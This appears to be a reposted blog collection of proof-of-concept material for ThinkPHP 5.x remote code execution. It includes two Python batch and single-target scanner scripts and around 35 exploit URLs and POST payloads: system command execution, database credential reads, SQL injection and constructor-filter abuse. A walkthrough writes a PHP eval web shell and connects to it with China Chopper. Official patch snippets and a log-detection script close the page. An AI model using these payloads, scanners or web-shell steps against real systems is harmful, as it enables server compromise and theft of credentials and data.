ThinkPHP V5.X Remote Code Execution Vulnerability - POC (collection: 5.0*, 5.1*, 5.2*)
thinkphp-RCE-POC
Official announcements:
1. https://blog.thinkphp.cn/869075
2. https://blog.thinkphp.cn/910675
POC:
Batch detection
```python
#!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
name: ThinkPHP remote code execution check
description: ThinkPHP5 5.0.22/5.1.29 remote code execution vulnerability
'''
import queue
import threading

import requests
from bs4 import BeautifulSoup


class thinkphp_rce(threading.Thread):
    """Worker thread: pulls targets from the shared queue and probes each one."""

    def __init__(self, q):
        threading.Thread.__init__(self)
        self.q = q

    def run(self):
        while not self.q.empty():
            url = self.q.get()
            headers = {"User-Agent": "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"}
            payload = r"/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1"
            vulnurl = url + payload
            try:
                response = requests.get(vulnurl, headers=headers, timeout=3, verify=False, allow_redirects=False)
                soup = BeautifulSoup(response.text, "lxml")
                # A phpinfo() page in the response means the probe was executed.
                if 'PHP Version' in str(soup.text):
                    print('[+] Remote code execution vulnerability exists at the target address')
                    print('[+] Vulnerability url address ' + vulnurl)
                    with open('target.txt', 'a') as f1:
                        f1.write(vulnurl + '\n')
                else:
                    print('[-] There is no remote code execution vulnerability in the target address')
            except Exception:
                print('[!] Destination address cannot be connected')


def urlget():
    """Read targets from url.txt (one per line), prefixing http:// where no scheme is given."""
    with open('url.txt', 'r') as f:
        urls = f.readlines()
    for tmp in urls:
        if '//' in tmp:
            url = tmp.strip('\n')
        else:
            url = 'http://' + tmp.strip('\n')
        urlList.append(url)
    return urlList


if __name__ == "__main__":
    print('''----------------Scan started-------------------
*Made by :tdcoming
*For More :https://t.zsxq.com/Ai2rj6E
*MY Heart :https://t.zsxq.com/A2FQFMN''')
    urlList = []
    urlget()
    threads = []
    threads_count = 10
    q = queue.Queue()
    for url in urlList:
        q.put(url)
    for i in range(threads_count):
        threads.append(thinkphp_rce(q))
    for i in threads:
        i.start()
    for i in threads:
        i.join()
```
Single-target detection
```python
#!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
name: ThinkPHP remote code execution check
description: ThinkPHP5 5.0.22/5.1.29 remote code execution vulnerability
'''
import sys

import requests
from bs4 import BeautifulSoup


class thinkphp_rce(object):
    def __init__(self):
        pass

    def run(self, url):
        headers = {"User-Agent": "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"}
        # Common deployment paths for the two affected release lines.
        payloads = [
            r"/thinkphp/public/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1",
            r"/thinkphp_5.0.22/public/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1",
            r"/thinkphp5.0.22/public/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1",
            r"/thinkphp5.1.29/public/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1",
            r"/thinkphp_5.1.29/public/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1",
        ]
        for payload in payloads:
            vulnurl = url + payload
            try:
                response = requests.get(vulnurl, headers=headers, timeout=3, verify=False, allow_redirects=False)
                soup = BeautifulSoup(response.text, "lxml")
                if 'PHP Version' in str(soup.text):
                    print('[+] Remote code execution vulnerability exists at the target address')
                    print('[+] Vulnerability url address ' + vulnurl)
                    break
                else:
                    print('[-] There is no remote code execution vulnerability in the target address')
            except Exception as e:
                print('[!] Destination address cannot be connected')
                print(str(e))


if __name__ == "__main__":
    print('''----------------Scan started-------------------
*Made by :tdcoming
*For More :https://t.zsxq.com/Ai2rj6E
*MY Heart :https://t.zsxq.com/A2FQFMN''')
    #if len(sys.argv) != 2:
    #    sys.exit("\n [+] Usage: python %s http://x.x.x.x\n" % sys.argv[0])
    #url = sys.argv[1]
    url = "http://127.0.0.1"
    thinkphp_rce().run(url)
```
thinkphp 5.0.22
1、http://192.168.1.1/thinkphp/public/?s=.|think\config/get&name=database.username
2、http://192.168.1.1/thinkphp/public/?s=.|think\config/get&name=database.password
3、http://url/to/thinkphp_5.0.22/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
4、http://url/to/thinkphp_5.0.22/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
thinkphp 5
5、http://127.0.0.1/tp5/public/?s=index/\think\View/display&content=%22%3C?%3E%3C?php%20phpinfo();?%3E&data=1
thinkphp 5.0.21
6、http://localhost/thinkphp_5.0.21/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
7、http://localhost/thinkphp_5.0.21/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
thinkphp 5.1.*
8、http://url/to/thinkphp5.1.29/?s=index/\think\Request/input&filter=phpinfo&data=1
9、http://url/to/thinkphp5.1.29/?s=index/\think\Request/input&filter=system&data=cmd
10、http://url/to/thinkphp5.1.29/?s=index/\think\template\driver\file/write&cacheFile=shell.php&content=%3C?php%20phpinfo();?%3E
11、http://url/to/thinkphp5.1.29/?s=index/\think\view\driver\Php/display&content=%3C?php%20phpinfo();?%3E
12、http://url/to/thinkphp5.1.29/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
13、http://url/to/thinkphp5.1.29/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd
14、http://url/to/thinkphp5.1.29/?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
15、http://url/to/thinkphp5.1.29/?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd
Unknown version
16、?s=index/\think\module/action/param1/${@phpinfo()}
17、?s=index/\think\Module/Action/Param/${@phpinfo()}
18、?s=index/\think/module/aciton/param1/${@print(THINK_VERSION)}
19、index.php?s=/home/article/view_recent/name/1'
header = "X-Forwarded-For:1') and extractvalue(1, concat(0x5c,(select md5(233))))#"
20、index.php?s=/home/shopcart/getPricetotal/tag/1%27
21、index.php?s=/home/shopcart/getpriceNum/id/1%27
22、index.php?s=/home/user/cut/id/1%27
23、index.php?s=/home/service/index/id/1%27
24、index.php?s=/home/pay/chongzhi/orderid/1%27
25、index.php?s=/home/pay/index/orderid/1%27
26、index.php?s=/home/order/complete/id/1%27
27、index.php?s=/home/order/complete/id/1%27
28、index.php?s=/home/order/detail/id/1%27
29、index.php?s=/home/order/cancel/id/1%27
30、index.php?s=/home/pay/index/orderid/1%27)%20UNION%20ALL%20SELECT%20md5(233)--+
31、POST /index.php?s=/home/user/checkcode/ HTTP/1.1
Content-Disposition: form-data; name="couponid"
1') union select sleep('''+str(sleep_time)+''')#
thinkphp 5.0.23 (full version), debug mode
32、(post)public/index.php (data)_method=__construct&filter[]=system&server[REQUEST_METHOD]=touch%20/tmp/xxx
thinkphp 5.0.23 (full version)
33、(post)public/index.php?s=captcha (data) _method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=ls -al
thinkphp 5.0.10 (full version)
34、(post)public/index.php?s=index/index/index (data)s=whoami&_method=__construct&method&filter[]=system
thinkphp 5.1.*, 5.2.* and 5.0.*
35、(post)public/index.php (data)c=exec&f=calc.exe&_method=filter
One last note: TP6 may have an arbitrary file upload vulnerability.
1. Vulnerability description
On 10 December 2018, ThinkPHP released a security update that fixes a high-severity vulnerability in the ThinkPHP5 framework: https://blog.thinkphp.cn/869075
The root cause is that the framework does not sufficiently validate the controller name, which can lead to remote code execution when forced routing is not enabled (it is disabled by default). Affected versions include 5.0 and 5.1.
2. Affected versions
Thinkphp 5.x-Thinkphp 5.1.31
Thinkphp 5.0.x<=5.0.23
3. Reproducing the vulnerability
1. Download ThinkPHP 5.0.22 from the official site: http://www.thinkphp.cn/donate/download/id/1260.html
2. Set up the environment with phpStudy, extract the downloaded ThinkPHP 5.0.22 into the web root, and open http://192.168.10.171/thinkphp5.0.22/public in a browser
3. Remote command execution via the system function
Payload:
?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami
4. View the phpinfo() output via the phpinfo function
Payload:
?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
5. Write a shell
Payload:
?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo ^<?php @eval($_POST[cmd]);?^> >shell.php
Note: special characters must be escaped with ^ (the escaping convention in a cmd environment); on Windows the echo command writes a string to a file without quotes (neither single nor double), and some characters work whether they are URL-encoded or not.
6. Check whether the shell was written successfully
7. Connect with China Chopper (菜刀)
8. Second method of writing a shell
Payload:
?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=../test.php&vars[1][]=<?php @eval($_POST[test]);?>
9. Check whether the file was written successfully
10. Connect with China Chopper (菜刀)
Fixing the remote code execution vulnerability in ThinkPHP 5.0 and 5.1
Version 5.0
In the module method of the thinkphp/library/think/App.php class, add the following after the code that obtains the controller name:
```php
if (!preg_match('/^[A-Za-z](\w|\.)*$/', $controller)) {
    throw new HttpException(404, 'controller not exists:' . $controller);
}
```
Version 5.1
In the parseUrl method of the thinkphp/library/think/route/dispatch/Url.php class, add the following after the controller has been parsed:
```php
if ($controller && !preg_match('/^[A-Za-z](\w|\.)*$/', $controller)) {
    throw new HttpException(404, 'controller not exists:' . $controller);
}
```
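The same regex the official patch applies can be reused on the defensive side to triage web-server access logs for the probe shapes listed earlier on this page. The following is an added example, not code from the page or from the ThinkPHP project; it goes slightly beyond the patch by checking the module and action segments of the `s=` route as well as the controller, and the log lines are constructed samples.

```python
import re
from urllib.parse import urlsplit, parse_qs

# The pattern the official ThinkPHP 5.0/5.1 patch applies to the controller name.
CONTROLLER_RE = re.compile(r'^[A-Za-z](\w|\.)*$')

# Matches the request target in a combined-format (Apache/Nginx) access log line.
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')


def route_violation(s_value):
    """Return the first module/controller/action segment of a ThinkPHP ``s=``
    route that the patch regex rejects, or None when all three look sane.
    Segments after the third are route parameters and may legitimately hold
    arbitrary characters, so they are not checked."""
    segments = [seg for seg in s_value.strip('/').split('/') if seg][:3]
    for seg in segments:
        if not CONTROLLER_RE.match(seg):
            return seg
    return None


def scan_log(lines):
    """Return (client_ip, s_value, offending_segment) for every request whose
    ``s`` query parameter names a class path instead of a plain controller."""
    hits = []
    for line in lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue
        query = urlsplit(match.group(1)).query
        # parse_qs URL-decodes values, so %5C-encoded backslashes are caught too.
        for s_value in parse_qs(query, keep_blank_values=True).get('s', []):
            offending = route_violation(s_value)
            if offending is not None:
                hits.append((line.split()[0], s_value, offending))
    return hits


# Constructed sample lines: two benign ThinkPHP routes and three probes of the
# shapes listed above (5.0 invokefunction, 5.1 Request/input, config/get).
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2018:12:00:01 +0000] "GET /public/?s=index/user/login HTTP/1.1" 200 512',
    '10.0.0.9 - - [10/Dec/2018:12:00:02 +0000] "GET /public/?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 HTTP/1.1" 200 40211',
    '10.0.0.7 - - [10/Dec/2018:12:00:03 +0000] "GET /public/index.php?s=index/article/view/id/1 HTTP/1.1" 200 900',
    '10.0.0.9 - - [10/Dec/2018:12:00:04 +0000] "GET /public/?s=index/%5Cthink%5CRequest/input&filter=phpinfo&data=1 HTTP/1.1" 200 40211',
    '10.0.0.9 - - [10/Dec/2018:12:00:05 +0000] "GET /thinkphp/public/?s=.|think%5Cconfig/get&name=database.username HTTP/1.1" 200 64',
]

if __name__ == '__main__':
    for ip, route, seg in scan_log(SAMPLE_LOG):
        print('[!] %s requested s=%s (rejected segment: %s)' % (ip, route, seg))
```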
Summary
The above is the full content of "ThinkPHP V5.X Remote Code Execution Vulnerability - POC (collection: 5.0*, 5.1*, 5.2*)" collected and compiled for you by 生活随笔; we hope the article helps you solve the problems you encounter.